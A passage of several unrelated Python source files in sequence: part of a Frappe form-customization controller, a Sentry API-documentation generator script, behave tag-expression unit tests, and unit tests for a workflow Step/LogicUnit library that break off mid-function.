and frappe.db.get_value("DocField", {"parent": self.doc_type, "fieldname": df.fieldname}, "read_only")==1):
# if docfield has read_only checked and user is trying to make it editable, don't allow it
frappe.msgprint(_("You cannot unset 'Read Only' for field {0}").format(df.label))
continue
elif property == "options" and df.get("fieldtype") not in allowed_fieldtype_for_options_change:
frappe.msgprint(_("You can't set 'Options' for field {0}").format(df.label))
continue
self.make_property_setter(property=property, value=df.get(property),
property_type=docfield_properties[property], fieldname=df.fieldname)
def update_custom_fields(self):
for i, df in enumerate(self.get("fields")):
if df.get("is_custom_field"):
if not frappe.db.exists('Custom Field', {'dt': self.doc_type, 'fieldname': df.fieldname}):
self.add_custom_field(df, i)
self.flags.update_db = True
else:
self.update_in_custom_field(df, i)
self.delete_custom_fields()
def add_custom_field(self, df, i):
d = frappe.new_doc("Custom Field")
d.dt = self.doc_type
for property in docfield_properties:
d.set(property, df.get(property))
if i!=0:
d.insert_after = self.fields[i-1].fieldname
d.idx = i
d.insert()
df.fieldname = d.fieldname
def update_in_custom_field(self, df, i):
meta = frappe.get_meta(self.doc_type)
meta_df = meta.get("fields", {"fieldname": df.fieldname})
if not (meta_df and meta_df[0].get("is_custom_field")):
# not a custom field
return
custom_field = frappe.get_doc("Custom Field", meta_df[0].name)
changed = False
for property in docfield_properties:
if df.get(property) != custom_field.get(property):
if property == "fieldtype":
self.validate_fieldtype_change(df, meta_df[0].get(property), df.get(property))
custom_field.set(property, df.get(property))
changed = True
# check and update `insert_after` property
if i!=0:
insert_after = self.fields[i-1].fieldname
if custom_field.insert_after != insert_after:
custom_field.insert_after = insert_after
custom_field.idx = i
changed = True
if changed:
custom_field.db_update()
self.flags.update_db = True
#custom_field.save()
def delete_custom_fields(self):
meta = frappe.get_meta(self.doc_type)
fields_to_remove = (set([df.fieldname for df in meta.get("fields")])
- set(df.fieldname for df in self.get("fields")))
for fieldname in fields_to_remove:
df = meta.get("fields", {"fieldname": fieldname})[0]
if df.get("is_custom_field"):
frappe.delete_doc("Custom Field", df.name)
def make_property_setter(self, property, value, property_type, fieldname=None):
self.delete_existing_property_setter(property, fieldname)
property_value = self.get_existing_property_value(property, fieldname)
if property_value==value:
return
# create a new property setter
# ignore validation because it will be done at the end
frappe.make_property_setter({
"doctype": self.doc_type,
"doctype_or_field": "DocField" if fieldname else "DocType",
"fieldname": fieldname,
"property": property,
"value": value,
"property_type": property_type
}, ignore_validate=True)
def delete_existing_property_setter(self, property, fieldname=None):
# first delete existing property setter
existing_property_setter = frappe.db.get_value("Property Setter", {"doc_type": self.doc_type,
"property": property, "field_name['']": fieldname or ''})
if existing_property_setter:
frappe.db.sql("delete from `tabProperty Setter` where name=%s", existing_property_setter)
def get_existing_property_value(self, property_name, fieldname=None):
# check if there is any need to make property setter!
if fieldname:
property_value = frappe.db.get_value("DocField", {"parent": self.doc_type,
"fieldname": fieldname}, property_name)
else:
try:
property_value = frappe.db.get_value("DocType", self.doc_type, property_name)
except Exception as e:
if e.args[0]==1054:
property_value = None
else:
raise
return property_value
def validate_fieldtype_change(self, df, old_value, new_value):
allowed = False
for allowed_changes in allowed_fieldtype_change:
if (old_value in allowed_changes and new_value in allowed_changes):
allowed = True
break
if not allowed:
frappe.throw(_("Fieldtype cannot be changed from {0} to {1} in row {2}").format(old_value, new_value, df.idx))
def reset_to_defaults(self):
if not self.doc_type:
return
frappe.db.sql("""delete from `tabProperty Setter` where doc_type=%s
and ifnull(field_name, '')!='naming_series'""", self.doc_type)
frappe.clear_cache(doctype=self.doc_type)
self.fetch_to_customize()
|
|
import os
import zlib
import json
import click
import urlparse
import logging
from datetime import datetime
from subprocess import Popen, PIPE
from contextlib import contextmanager
HERE = os.path.abspath(os.path.dirname(__file__))
SENTRY_CONFIG = os.path.join(HERE, 'sentry.conf.py')
# No sentry or django imports before that point
from sentry.utils import runner
runner.configure(config_path=SENTRY_CONFIG, skip_backend_validation=True)
from django.conf import settings
# Fair game from here
from django.core.management import call_command
from sentry.utils.apidocs import Runner, MockUtils, iter_scenarios, \
iter_endpoints, get_sections
OUTPUT_PATH = os.path.join(HERE, 'cache')
HOST = urlparse.urlparse(settings.SENTRY_URL_PREFIX).netloc
# We don't care about you, go away
_logger = logging.getLogger('sentry.events')
_logger.disabled = True
def color_for_string(s):
colors = ('red', 'green', 'yellow', 'blue', 'cyan', 'magenta')
return colors[zlib.crc32(s) % len(colors)]
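# Note: zlib.crc32 is deterministic for a given byte string, so each category
# name (e.g. 'redis', 'sentry', 'db') is always rendered in the same color
# across runs.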
def report(category, message, fg=None):
if fg is None:
fg = color_for_string(category)
click.echo('[%s] %s: %s' % (
str(datetime.utcnow()).split('.')[0],
click.style(category, fg=fg),
message
))
def launch_redis():
report('redis', 'Launching redis server')
cl = Popen(['redis-server', '-'], stdin=PIPE, stdout=open(os.devnull, 'r+'))
cl.stdin.write('''
port %(port)s
databases %(databases)d
save ""
''' % {
'port': str(settings.SENTRY_APIDOCS_REDIS_PORT),
'databases': 4,
})
cl.stdin.flush()
cl.stdin.close()
return cl
def spawn_sentry():
report('sentry', 'Launching sentry server')
cl = Popen(['sentry', '--config=' + SENTRY_CONFIG, 'runserver',
'-v', '0', '--noreload', '--nothreading',
'--no-watchers', '--traceback',
'127.0.0.1:%s' % settings.SENTRY_APIDOCS_WEB_PORT])
return cl
@contextmanager
def management_connection():
from sqlite3 import connect
cfg = settings.DATABASES['default']
con = connect(cfg['NAME'])
try:
con.cursor()
yield con
finally:
con.close()
def init_db():
drop_db()
report('db', 'Migrating database (this can take some time)')
call_command('syncdb', migrate=True, interactive=False,
traceback=True, verbosity=0)
def drop_db():
report('db', 'Dropping database')
try:
os.remove(settings.DATABASES['default']['NAME'])
except (OSError, IOError):
pass
class SentryBox(object):
def __init__(self):
self.redis = None
self.sentry = None
self.task_runner = None
def __enter__(self):
self.redis = launch_redis()
self.sentry = spawn_sentry()
init_db()
return self
def __exit__(self, exc_type, exc_value, tb):
drop_db()
if self.redis is not None:
report('redis', 'Stopping redis server')
self.redis.kill()
self.redis.wait()
if self.sentry is not None:
report('sentry', 'Shutting down sentry server')
self.sentry.kill()
self.sentry.wait()
def dump_json(path, data):
path = os.path.join(OUTPUT_PATH, path)
try:
os.makedirs(os.path.dirname(path))
except OSError:
pass
with open(path, 'w') as f:
for line in json.dumps(data, indent=2, sort_keys=True).splitlines():
f.write(line.rstrip() + '\n')
def run_scenario(vars, scenario_ident, func):
runner = Runner(scenario_ident, func, **vars)
report('scenario', 'Running scenario "%s"' % scenario_ident)
func(runner)
dump_json('scenarios/%s.json' % scenario_ident, runner.to_json())
@click.command()
@click.option('--output-path', type=click.Path())
def cli(output_path):
"""API docs dummy generator."""
global OUTPUT_PATH
if output_path is not None:
OUTPUT_PATH = os.path.abspath(output_path)
with SentryBox():
utils = MockUtils()
report('org', 'Creating user and organization')
user = utils.create_user('[email protected]')
org = utils.create_org('The Interstellar Jurisdiction',
owner=user)
api_key = utils.create_api_key(org)
report('org', 'Creating team')
team = utils.create_team('Powerful Abolitionist',
org=org)
projects = []
for project_name in 'Pump Station', 'Prime Mover':
report('project', 'Creating project "%s"' % project_name)
project = utils.create_project(project_name, team=team, org=org)
release = utils.create_release(project=project, user=user)
report('event', 'Creating event for "%s"' % project_name)
event1 = utils.create_event(project=project, release=release,
platform='python')
event2 = utils.create_event(project=project, release=release,
platform='java')
projects.append({
'project': project,
'release': release,
'events': [event1, event2],
})
vars = {
'org': org,
'api_key': api_key,
'me': user,
'teams': [{
'team': team,
'projects': projects,
}],
}
for scenario_ident, func in iter_scenarios():
run_scenario(vars, scenario_ident, func)
section_mapping = {}
report('docs', 'Exporting endpoint documentation')
for endpoint in iter_endpoints():
report('endpoint', 'Exporting docs for "%s"' %
endpoint['endpoint_name'])
section_mapping.setdefault(endpoint['section'], []) \
.append((endpoint['endpoint_name'],
endpoint['title']))
dump_json('endpoints/%s.json' % endpoint['endpoint_name'], endpoint)
report('docs', 'Exporting sections')
dump_json('sections.json', {
'sections': dict((section, {
'title': title,
'entries': dict(section_mapping.get(section, ())),
}) for section, title in get_sections().iteritems())
})
if __name__ == '__main__':
cli()
|
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from behave.tag_expression import TagExpression
import pytest
import unittest
# ----------------------------------------------------------------------------
# BASIC TESTS: 0..1 tags, not @tag
# ----------------------------------------------------------------------------
class TestTagExpressionNoTags(unittest.TestCase):
def setUp(self):
self.e = TagExpression([])
def test_should_match_empty_tags(self):
assert self.e.check([])
def test_should_match_foo(self):
assert self.e.check(['foo'])
class TestTagExpressionFoo(unittest.TestCase):
def setUp(self):
self.e = TagExpression(['foo'])
def test_should_not_match_no_tags(self):
assert not self.e.check([])
def test_should_match_foo(self):
assert self.e.check(['foo'])
def test_should_not_match_bar(self):
assert not self.e.check(['bar'])
class TestTagExpressionNotFoo(unittest.TestCase):
def setUp(self):
self.e = TagExpression(['-foo'])
def test_should_match_no_tags(self):
assert self.e.check([])
def test_should_not_match_foo(self):
assert not self.e.check(['foo'])
def test_should_match_bar(self):
assert self.e.check(['bar'])
# ----------------------------------------------------------------------------
# LOGICAL-AND TESTS: With @foo, @bar (2 tags)
# ----------------------------------------------------------------------------
class TestTagExpressionFooAndBar(unittest.TestCase):
# -- LOGIC: @foo and @bar
def setUp(self):
self.e = TagExpression(['foo', 'bar'])
def test_should_not_match_no_tags(self):
assert not self.e.check([])
def test_should_not_match_foo(self):
assert not self.e.check(['foo'])
def test_should_not_match_bar(self):
assert not self.e.check(['bar'])
def test_should_not_match_other(self):
assert not self.e.check(['other'])
def test_should_match_foo_bar(self):
assert self.e.check(['foo', 'bar'])
assert self.e.check(['bar', 'foo'])
def test_should_not_match_foo_other(self):
assert not self.e.check(['foo', 'other'])
assert not self.e.check(['other', 'foo'])
def test_should_not_match_bar_other(self):
assert not self.e.check(['bar', 'other'])
assert not self.e.check(['other', 'bar'])
def test_should_not_match_zap_other(self):
assert not self.e.check(['zap', 'other'])
assert not self.e.check(['other', 'zap'])
def test_should_match_foo_bar_other(self):
assert self.e.check(['foo', 'bar', 'other'])
assert self.e.check(['bar', 'other', 'foo'])
assert self.e.check(['other', 'bar', 'foo'])
def test_should_not_match_foo_zap_other(self):
assert not self.e.check(['foo', 'zap', 'other'])
assert not self.e.check(['other', 'zap', 'foo'])
def test_should_not_match_bar_zap_other(self):
assert not self.e.check(['bar', 'zap', 'other'])
assert not self.e.check(['other', 'bar', 'zap'])
def test_should_not_match_zap_baz_other(self):
assert not self.e.check(['zap', 'baz', 'other'])
assert not self.e.check(['baz', 'other', 'zap'])
assert not self.e.check(['other', 'baz', 'zap'])
class TestTagExpressionFooAndNotBar(unittest.TestCase):
# -- LOGIC: @foo and not @bar
def setUp(self):
self.e = TagExpression(['foo', '-bar'])
def test_should_not_match_no_tags(self):
assert not self.e.check([])
def test_should_match_foo(self):
assert self.e.check(['foo'])
def test_should_not_match_bar(self):
assert not self.e.check(['bar'])
def test_should_not_match_other(self):
assert not self.e.check(['other'])
def test_should_not_match_foo_bar(self):
assert not self.e.check(['foo', 'bar'])
assert not self.e.check(['bar', 'foo'])
def test_should_match_foo_other(self):
assert self.e.check(['foo', 'other'])
assert self.e.check(['other', 'foo'])
def test_should_not_match_bar_other(self):
assert not self.e.check(['bar', 'other'])
assert not self.e.check(['other', 'bar'])
def test_should_not_match_zap_other(self):
assert not self.e.check(['zap', 'other'])
assert not self.e.check(['other', 'zap'])
def test_should_not_match_foo_bar_other(self):
assert not self.e.check(['foo', 'bar', 'other'])
assert not self.e.check(['bar', 'other', 'foo'])
assert not self.e.check(['other', 'bar', 'foo'])
def test_should_match_foo_zap_other(self):
assert self.e.check(['foo', 'zap', 'other'])
assert self.e.check(['other', 'zap', 'foo'])
def test_should_not_match_bar_zap_other(self):
assert not self.e.check(['bar', 'zap', 'other'])
assert not self.e.check(['other', 'bar', 'zap'])
def test_should_not_match_zap_baz_other(self):
assert not self.e.check(['zap', 'baz', 'other'])
assert not self.e.check(['baz', 'other', 'zap'])
assert not self.e.check(['other', 'baz', 'zap'])
class TestTagExpressionNotBarAndFoo(TestTagExpressionFooAndNotBar):
# -- REUSE: Test suite due to symmetry in reversed expression
# LOGIC: not @bar and @foo == @foo and not @bar
def setUp(self):
self.e = TagExpression(['-bar', 'foo'])
class TestTagExpressionNotFooAndNotBar(unittest.TestCase):
# -- LOGIC: not @bar and not @foo
def setUp(self):
self.e = TagExpression(['-foo', '-bar'])
def test_should_match_no_tags(self):
assert self.e.check([])
def test_should_not_match_foo(self):
assert not self.e.check(['foo'])
def test_should_not_match_bar(self):
assert not self.e.check(['bar'])
def test_should_match_other(self):
assert self.e.check(['other'])
def test_should_not_match_foo_bar(self):
assert not self.e.check(['foo', 'bar'])
assert not self.e.check(['bar', 'foo'])
def test_should_not_match_foo_other(self):
assert not self.e.check(['foo', 'other'])
assert not self.e.check(['other', 'foo'])
def test_should_not_match_bar_other(self):
assert not self.e.check(['bar', 'other'])
assert not self.e.check(['other', 'bar'])
def test_should_match_zap_other(self):
assert self.e.check(['zap', 'other'])
assert self.e.check(['other', 'zap'])
def test_should_not_match_foo_bar_other(self):
assert not self.e.check(['foo', 'bar', 'other'])
assert not self.e.check(['bar', 'other', 'foo'])
assert not self.e.check(['other', 'bar', 'foo'])
def test_should_not_match_foo_zap_other(self):
assert not self.e.check(['foo', 'zap', 'other'])
assert not self.e.check(['other', 'zap', 'foo'])
def test_should_not_match_bar_zap_other(self):
assert not self.e.check(['bar', 'zap', 'other'])
assert not self.e.check(['other', 'bar', 'zap'])
def test_should_match_zap_baz_other(self):
assert self.e.check(['zap', 'baz', 'other'])
assert self.e.check(['baz', 'other', 'zap'])
assert self.e.check(['other', 'baz', 'zap'])
class TestTagExpressionNotBarAndNotFoo(TestTagExpressionNotFooAndNotBar):
# -- REUSE: Test suite due to symmetry in reversed expression
# LOGIC: not @bar and not @foo == not @foo and not @bar
def setUp(self):
self.e = TagExpression(['-bar', '-foo'])
# ----------------------------------------------------------------------------
# LOGICAL-OR TESTS: With @foo, @bar (2 tags)
# ----------------------------------------------------------------------------
class TestTagExpressionFooOrBar(unittest.TestCase):
def setUp(self):
self.e = TagExpression(['foo,bar'])
def test_should_not_match_no_tags(self):
assert not self.e.check([])
def test_should_match_foo(self):
assert self.e.check(['foo'])
def test_should_match_bar(self):
assert self.e.check(['bar'])
def test_should_not_match_other(self):
assert not self.e.check(['other'])
def test_should_match_foo_bar(self):
assert self.e.check(['foo', 'bar'])
assert self.e.check(['bar', 'foo'])
def test_should_match_foo_other(self):
assert self.e.check(['foo', 'other'])
assert self.e.check(['other', 'foo'])
def test_should_match_bar_other(self):
assert self.e.check(['bar', 'other'])
assert self.e.check(['other', 'bar'])
def test_should_not_match_zap_other(self):
assert not self.e.check(['zap', 'other'])
assert not self.e.check(['other', 'zap'])
def test_should_match_foo_bar_other(self):
assert self.e.check(['foo', 'bar', 'other'])
assert self.e.check(['bar', 'other', 'foo'])
assert self.e.check(['other', 'bar', 'foo'])
def test_should_match_foo_zap_other(self):
assert self.e.check(['foo', 'zap', 'other'])
assert self.e.check(['other', 'zap', 'foo'])
def test_should_match_bar_zap_other(self):
assert self.e.check(['bar', 'zap', 'other'])
assert self.e.check(['other', 'bar', 'zap'])
def test_should_not_match_zap_baz_other(self):
assert not self.e.check(['zap', 'baz', 'other'])
assert not self.e.check(['baz', 'other', 'zap'])
assert not self.e.check(['other', 'baz', 'zap'])
class TestTagExpressionBarOrFoo(TestTagExpressionFooOrBar):
# -- REUSE: Test suite due to symmetry in reversed expression
# LOGIC: @bar or @foo == @foo or @bar
def setUp(self):
self.e = TagExpression(['bar,foo'])
class TestTagExpressionFooOrNotBar(unittest.TestCase):
def setUp(self):
self.e = TagExpression(['foo,-bar'])
def test_should_match_no_tags(self):
assert self.e.check([])
def test_should_match_foo(self):
assert self.e.check(['foo'])
def test_should_not_match_bar(self):
assert not self.e.check(['bar'])
def test_should_match_other(self):
assert self.e.check(['other'])
def test_should_match_foo_bar(self):
assert self.e.check(['foo', 'bar'])
assert self.e.check(['bar', 'foo'])
def test_should_match_foo_other(self):
assert self.e.check(['foo', 'other'])
assert self.e.check(['other', 'foo'])
def test_should_not_match_bar_other(self):
assert not self.e.check(['bar', 'other'])
assert not self.e.check(['other', 'bar'])
def test_should_match_zap_other(self):
assert self.e.check(['zap', 'other'])
assert self.e.check(['other', 'zap'])
def test_should_match_foo_bar_other(self):
assert self.e.check(['foo', 'bar', 'other'])
assert self.e.check(['bar', 'other', 'foo'])
assert self.e.check(['other', 'bar', 'foo'])
def test_should_match_foo_zap_other(self):
assert self.e.check(['foo', 'zap', 'other'])
assert self.e.check(['other', 'zap', 'foo'])
def test_should_not_match_bar_zap_other(self):
assert not self.e.check(['bar', 'zap', 'other'])
assert not self.e.check(['other', 'bar', 'zap'])
def test_should_match_zap_baz_other(self):
assert self.e.check(['zap', 'baz', 'other'])
assert self.e.check(['baz', 'other', 'zap'])
assert self.e.check(['other', 'baz', 'zap'])
class TestTagExpressionNotBarOrFoo(TestTagExpressionFooOrNotBar):
# -- REUSE: Test suite due to symmetry in reversed expression
# LOGIC: not @bar or @foo == @foo or not @bar
def setUp(self):
self.e = TagExpression(['-bar,foo'])
class TestTagExpressionNotFooOrNotBar(unittest.TestCase):
def setUp(self):
self.e = TagExpression(['-foo,-bar'])
def test_should_match_no_tags(self):
assert self.e.check([])
def test_should_match_foo(self):
assert self.e.check(['foo'])
def test_should_match_bar(self):
assert self.e.check(['bar'])
def test_should_match_other(self):
assert self.e.check(['other'])
def test_should_not_match_foo_bar(self):
assert not self.e.check(['foo', 'bar'])
assert not self.e.check(['bar', 'foo'])
def test_should_match_foo_other(self):
assert self.e.check(['foo', 'other'])
assert self.e.check(['other', 'foo'])
def test_should_match_bar_other(self):
assert self.e.check(['bar', 'other'])
assert self.e.check(['other', 'bar'])
def test_should_match_zap_other(self):
assert self.e.check(['zap', 'other'])
assert self.e.check(['other', 'zap'])
def test_should_not_match_foo_bar_other(self):
assert not self.e.check(['foo', 'bar', 'other'])
assert not self.e.check(['bar', 'other', 'foo'])
assert not self.e.check(['other', 'bar', 'foo'])
def test_should_match_foo_zap_other(self):
assert self.e.check(['foo', 'zap', 'other'])
assert self.e.check(['other', 'zap', 'foo'])
def test_should_match_bar_zap_other(self):
assert self.e.check(['bar', 'zap', 'other'])
assert self.e.check(['other', 'bar', 'zap'])
def test_should_match_zap_baz_other(self):
assert self.e.check(['zap', 'baz', 'other'])
assert self.e.check(['baz', 'other', 'zap'])
assert self.e.check(['other', 'baz', 'zap'])
class TestTagExpressionNotBarOrNotFoo(TestTagExpressionNotFooOrNotBar):
# -- REUSE: Test suite due to symmetry in reversed expression
# LOGIC: not @bar or @foo == @foo or not @bar
def setUp(self):
self.e = TagExpression(['-bar,-foo'])
# ----------------------------------------------------------------------------
# MORE TESTS: With 3 tags
# ----------------------------------------------------------------------------
class TestTagExpressionFooOrBarAndNotZap(unittest.TestCase):
def setUp(self):
self.e = TagExpression(['foo,bar', '-zap'])
def test_should_match_foo(self):
assert self.e.check(['foo'])
def test_should_not_match_foo_zap(self):
assert not self.e.check(['foo', 'zap'])
def test_should_not_match_no_tags(self):
assert not self.e.check([])
def test_should_match_bar(self):
assert self.e.check(['bar'])
def test_should_not_match_other(self):
assert not self.e.check(['other'])
def test_should_match_foo_bar(self):
assert self.e.check(['foo', 'bar'])
assert self.e.check(['bar', 'foo'])
def test_should_match_foo_other(self):
assert self.e.check(['foo', 'other'])
assert self.e.check(['other', 'foo'])
def test_should_match_bar_other(self):
assert self.e.check(['bar', 'other'])
assert self.e.check(['other', 'bar'])
def test_should_not_match_zap_other(self):
assert not self.e.check(['zap', 'other'])
assert not self.e.check(['other', 'zap'])
def test_should_match_foo_bar_other(self):
assert self.e.check(['foo', 'bar', 'other'])
assert self.e.check(['bar', 'other', 'foo'])
assert self.e.check(['other', 'bar', 'foo'])
def test_should_not_match_foo_bar_zap(self):
assert not self.e.check(['foo', 'bar', 'zap'])
assert not self.e.check(['bar', 'zap', 'foo'])
assert not self.e.check(['zap', 'bar', 'foo'])
def test_should_not_match_foo_zap_other(self):
assert not self.e.check(['foo', 'zap', 'other'])
assert not self.e.check(['other', 'zap', 'foo'])
def test_should_not_match_bar_zap_other(self):
assert not self.e.check(['bar', 'zap', 'other'])
assert not self.e.check(['other', 'bar', 'zap'])
def test_should_not_match_zap_baz_other(self):
assert not self.e.check(['zap', 'baz', 'other'])
assert not self.e.check(['baz', 'other', 'zap'])
assert not self.e.check(['other', 'baz', 'zap'])
# ----------------------------------------------------------------------------
# TESTS WITH LIMIT
# ----------------------------------------------------------------------------
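# NOTE (assumed semantics of the ':N' suffix, in the spirit of cucumber-style
# tag limits): a tag written as 'foo:3' still matches @foo but also records a
# numeric cap of 3; TagExpression strips the suffix for matching and collects
# the caps in its .limits dict, which the tests below assert on.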
class TestTagExpressionFoo3OrNotBar4AndZap5(unittest.TestCase):
def setUp(self):
self.e = TagExpression(['foo:3,-bar', 'zap:5'])
def test_should_count_tags_for_positive_tags(self):
assert self.e.limits == {'foo': 3, 'zap': 5}
def test_should_match_foo_zap(self):
assert self.e.check(['foo', 'zap'])
class TestTagExpressionParsing(unittest.TestCase):
def setUp(self):
self.e = TagExpression([' foo:3 , -bar ', ' zap:5 '])
def test_should_have_limits(self):
assert self.e.limits == {'zap': 5, 'foo': 3}
class TestTagExpressionTagLimits(unittest.TestCase):
def test_should_be_counted_for_negative_tags(self):
e = TagExpression(['-todo:3'])
assert e.limits == {'todo': 3}
def test_should_be_counted_for_positive_tags(self):
e = TagExpression(['todo:3'])
assert e.limits == {'todo': 3}
def test_should_raise_an_error_for_inconsistent_limits(self):
with pytest.raises(Exception):
_ = TagExpression(['todo:3', '-todo:4'])
def test_should_allow_duplicate_consistent_limits(self):
e = TagExpression(['todo:3', '-todo:3'])
assert e.limits == {'todo': 3}
|
|
'''
Created on Feb 23, 2013
@author: nino
'''
import unittest
from mock import Mock, patch
from marx.workflow.step import Step, LogicUnit, ArgSpec, ResultSpec,\
ResultObject
import nose.tools
from tests.workflow.example_1 import run as run_example_1
from marx.workflow.context import DefaultContext
class Test(unittest.TestCase):
def test_call_context(self):
m = Mock()
m._accepts_context = True
ctx = DefaultContext()
with patch('inspect.getargspec') as argspec:
argspec.return_value = [[]]
Step(m)(ctx)
assert m.called
m.assert_called_once_with(context=ctx)
m.reset_mock()
with patch('inspect.getargspec') as argspec:
argspec.return_value = [['context']]
Step(m)(ctx)
assert m.called
m.assert_called_once_with(context=ctx)
def test_result_mapper_str(self):
m = Mock()
m.return_value = {'returned': 'bar'}
ctx = DefaultContext()
ctx.baz = None
with patch('inspect.getargspec') as argspec:
argspec.return_value = [[]]
Step(m, result_map={'baz': 'returned'})(ctx)
assert m.called
assert ctx.baz == 'bar'
def test_result_mapper_callable(self):
m = Mock()
m.return_value = {'returned': ['abc', 'bar']}
ctx = DefaultContext()
ctx.baz = None
def reverse_and_join(result, context): #@UnusedVariable
return "".join(result['returned'])[::-1]
with patch('inspect.getargspec') as argspec:
argspec.return_value = [[]]
Step(m, result_map={'baz': reverse_and_join})(ctx)
assert m.called
assert ctx.baz == 'rabcba'
def test_result_mapper_list(self):
m = Mock()
m.return_value = {'returned': {'bar': 1, 'boz': 2}}
ctx = DefaultContext()
ctx.baz = ctx.boz = None
with patch('inspect.getargspec') as argspec:
argspec.return_value = [[]]
Step(m, result_map={'baz': ('returned', 'bar'),
'boz': ('returned', 'boz')})(ctx)
assert m.called
print ctx.__dict__
assert ctx.baz == 1
assert ctx.boz == 2
def test_result_mapper_custom(self):
m = Mock()
m.return_value = {'returned': 'bar'}
m_rm = Mock()
ctx = DefaultContext()
with patch('inspect.getargspec') as argspec:
argspec.return_value = [[]]
Step(m, result_map=m_rm)(ctx)
assert m.called
assert m_rm.called
m_rm.assert_called_once_with(m.return_value, ctx)
def test_extra_kwargs(self):
m = Mock()
m._accepts_context = False
m.return_value = {'returned': 'bar'}
ctx = DefaultContext()
with patch('inspect.getargspec') as argspec:
argspec.return_value = [[]]
Step(m, extra_kwargs=dict(meow=True))(ctx)
assert m.called
m.assert_called_once_with(meow=True)
def test_arg_mapper(self):
m = Mock()
m._accepts_context = False
ctx = DefaultContext()
ctx.message = 1
ctx.meow = 1
with patch('inspect.getargspec') as argspec:
argspec.return_value = [[]]
Step(m, arg_map={'message': 'message'})(ctx)
Step(m, arg_map={'meow': 'message'})(ctx)
assert m.called
m.assert_any_call(message=1)
m.assert_any_call(meow=1)
def test_arg_mapper_custom(self):
m = Mock()
m._accepts_context = None
m_cm = Mock(return_value={'moo': True})
ctx = DefaultContext()
with patch('inspect.getargspec') as argspec:
argspec.return_value = [[]]
Step(m, arg_map=m_cm)(ctx)
assert m.called
m.assert_called_once_with(**m_cm.return_value)
def test_auto_map(self):
m_cm = Mock()
m_cm.moo = True
m_cm.meow = False
this = self
class Unit(LogicUnit):
def __call__(self, moo, meow, context):
this.success = (moo, meow, context)
Step(Unit(), arg_map=Unit.AutoMap())(m_cm)
assert this.success == (True, False, m_cm), this.success
def test_auto_map_override(self):
class Ctx:
moo = True
this = self
class Unit(LogicUnit):
def __call__(self, cow):
this.success = cow
Step(Unit(), arg_map=Unit.AutoMap({Unit.COW: 'moo'}))(Ctx())
assert this.success == (True), this.success
def test_auto_map_bad_field(self):
class Ctx:
cow = True
this = self
class Unit(LogicUnit):
def __call__(self, cow, pig):
this.success = cow, pig
nose.tools.assert_raises(AttributeError, Step(Unit(), arg_map=Unit.AutoMap()), Ctx()) # @UndefinedVariable
def test_auto_map_default(self):
class Ctx:
cow = True
this = self
class Unit(LogicUnit):
def __call__(self, cow, pig="not kosher"):
this.success = cow, pig
Step(Unit(), arg_map=Unit.AutoMap())(Ctx())
assert self.success == (True, "not kosher")
def test_callable_by_str(self):
ctx = DefaultContext()
with patch('inspect.getargspec') as argspec:
argspec.return_value = [[]]
Step('%s.a_callable' % __name__)(ctx)
assert a_callable.called
def test_results_declaration(self):
class Unit(LogicUnit):
meow = ArgSpec(bool, docs="The meow.")
the_cat_has_spoken = ResultSpec(bool, docs="Has the cat spoken?")
def __call__(self, meow):
self.result.the_cat_has_spoken = meow
test = Unit()
result = test(meow=True)
assert isinstance(result, ResultObject)
assert result['the_cat_has_spoken']
result = test(meow=False)
assert not result['the_cat_has_spoken']
def test_default_result_value(self):
class Unit(LogicUnit):
meow = ArgSpec(bool, docs="The meow.")
the_cat_has_spoken = ResultSpec(bool, default=True, docs="Has the cat spoken?")
def __call__(self, meow):
pass
test = Unit()
result = test(meow=True)
assert isinstance(result, dict)
assert result['the_cat_has_spoken']
assert result.the_cat_has_spoken == True
def test_alt_result_value(self):
class Unit(LogicUnit):
meow = ArgSpec(bool, docs="The meow.")
the_cat_has_spoken = ResultSpec(bool, default=True, docs="Has the cat spoken?")
def __call__(self, meow):
return {'the_cat_has_spoken': False}
test = Unit()
result = test(meow=True)
assert isinstance(result, dict)
assert not result['the_cat_has_spoken']
def test_wrong_type_result_value(self):
class Unit(LogicUnit):
the_cat_has_spoken = ResultSpec(bool, default=True, docs="Has the cat spoken?")
def __call__(self):
self.result.the_cat_has_spoken = 'meow'
#return self.get_result_map()
test = Unit()
nose.tools.assert_raises(TypeError, test)
def test_resultspec_in_multiple_instances(self):
class Unit(LogicUnit):
meow = ArgSpec(bool, docs="The meow.")
the_cat_has_spoken = ResultSpec(bool, docs="Has the cat spoken?")
def __call__(self, meow):
self.result.the_cat_has_spoken = meow
test = Unit()
doppelganger_test = Unit()
result_1 = test(meow=True)
result_2 = doppelganger_test(meow=False)
assert result_1['the_cat_has_spoken']
assert not result_2['the_cat_has_spoken']
# don't change this name, test above depends on it.
a_callable = Mock()
class TestLogicUnit(unittest.TestCase):
def test_args(self):
this = self
class Unit(LogicUnit):
astr = ArgSpec(str, docs="A string value")
def __call__(self, an_arg, astr="s", context=None):
this.value = an_arg
assert Unit.AN_ARG == "an_arg"
assert Unit.ASTR == "astr"
u = Unit()
# this is fine:
u(an_arg=1, astr="grr")
assert self.value == 1
assert Unit._accepts_context
# this should fail type checking
nose.tools.assert_raises(TypeError, u, an_arg=1, astr=1) #@UndefinedVariable
def test_composition(self):
class Domain(object): pass
class UserProfile(object): pass
class IsSameDomainUser(LogicUnit):
domain = ArgSpec(Domain)
user = ArgSpec(UserProfile)
def __call__(self, user, domain):
if not user.domain_id == domain.id:
raise Exception()
assert not IsSameDomainUser._accepts_context
s = Step(IsSameDomainUser(), arg_map={IsSameDomainUser.USER: 'actor',
IsSameDomainUser.DOMAIN: 'domain'})
class Context(DefaultContext):
domain = Domain()
actor = 1
assert s
assert isinstance(s._call, IsSameDomainUser)
with nose.tools.assert_raises(TypeError): #@UndefinedVariable
s(Context())
def test_default_value(self):
class HasADefault(LogicUnit):
meow = ArgSpec(int, default=1)
def __call__(self, meow):
if meow == 1:
raise ValueError()
raise IndexError()
assert HasADefault.MEOW is not None
nose.tools.assert_raises(ValueError, HasADefault()) #@UndefinedVariable
nose.tools.assert_raises(ValueError, HasADefault(), meow=1) #@UndefinedVariable
nose.tools.assert_raises(IndexError, HasADefault(), meow=10) #@UndefinedVariable
def test_nullable(self):
class Nullable(LogicUnit):
meow = ArgSpec(int, nullable=True)
def __call__(self, meow):
if meow is None:
raise ValueError()
return meow
# the default is none
nose.tools.assert_raises(ValueError, Nullable()) #@UndefinedVariable
nose.tools.assert_raises(ValueError, Nullable(), meow=None) #@UndefinedVariable
assert Nullable()(meow=10) == 10
class TestArgSpec(unittest.TestCase):
def test_any_arg(self):
s = ArgSpec(default="meow")
assert s.default == 'meow'
assert s.types == (object,)
self.assertRaises(ValueError, ArgSpec, int, meow="bad arg")
def test_bad_kwarg(self):
